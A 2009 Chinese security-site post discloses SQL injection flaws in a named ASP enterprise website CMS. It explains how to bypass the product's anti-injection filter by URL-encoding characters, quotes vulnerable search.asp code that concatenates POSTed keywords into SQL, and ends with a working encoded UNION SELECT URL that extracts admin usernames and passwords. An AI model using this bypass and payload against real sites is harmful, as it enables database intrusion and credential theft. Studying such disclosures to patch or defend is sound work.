频道栏目
首页 > 安全 > 企业安全 > 正文

尘月网络企业网站管理系统漏洞

2009-04-14 12:02:22           
收藏   我要投稿

company.asp中 get方式获取的变量id的值仅仅过滤空格 和判断

值是否为空 包含了一防注 仅仅过滤了get方式传递进来的参数值

company.asp中却是 request.querystring("id") 也就是说 不能使用 post

以及cookie注入 但是防注却用的枫叶防注 嘿嘿 地球人都知道 把变量id的i编码

%69 直接绕过 另外 search.asp中

<%
if trim(request.QueryString("Search"))="" then
   if trim(request.Form("Area"))="" then
      Search="None"
   else
      Search=trim(request.Form("Area"))
   end if
else
   Search=trim(request.QueryString("Search"))
end if
KeyWord=trim(request.Form("KeyWord"))
select case Search
   case "None"
      response.write "<script language=javascript> alert(您没有选择检索范围,点击返回!);history.back(-1);</script>"
      response.end
   case "Pro"
      Locality="检索产品&nbsp;>>&nbsp;关键字:"&KeyWord
   SQL = "SELECT id,LName,LAddtime FROM Products where LName like %"&KeyWord&"% or LKeyWord like %"&KeyWord&"% and  LPutout=true ORDER BY id DESC"
   case "News"
      Locality="检索新闻&nbsp;>>&nbsp;关键字:"&KeyWord
      SQL= "SELECT id,NewTitle,AddTime FROM News where NewTitle like %"&KeyWord&"% and Putout=true ORDER BY id DESC"
   case "zx"
      Locality="检索资讯&nbsp;>>&nbsp;关键字:"&KeyWord
      SQL= "SELECT id,FileName,AddTime FROM zx where FileName like %"&KeyWord&"% and Putout=true ORDER BY id DESC"
   case "tc"
      Locality="检索套餐&nbsp;>>&nbsp;关键字:"&KeyWord
      SQL= "SELECT id,Title,AddTime FROM tc where Title like %"&KeyWord&"% and Putout=true ORDER BY id DESC"
   case "Feedback"
      Locality="检索留言&nbsp;>>&nbsp;关键字:"&KeyWord
      SQL= "SELECT * FROM Feedback where Title like %"&KeyWord&"% and Outpub=true ORDER BY id DESC"
   case "down"
      Locality="检索下载&nbsp;>>&nbsp;关键字:"&KeyWord
      SQL= "SELECT id,FileName,AddTime FROM down where FileName like %"&KeyWord&"% and Putout=true ORDER BY id DESC"
end select
===========================
%>

看这里 KeyWord=trim(request.Form("KeyWord")) 是post了吧

注入吧 没任何限制
测试方法:
http://127.0.0.1/Company.asp?%69d=7%20or%201=2%20un%69on%20s%65lect%201,username,password,4,5,6,7,8%20fr%6Fm%20admin

 

上一篇:浅析VoIP与企业无线局域网安全问题
下一篇:从端口入手看企业如何防范SQL蠕虫
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站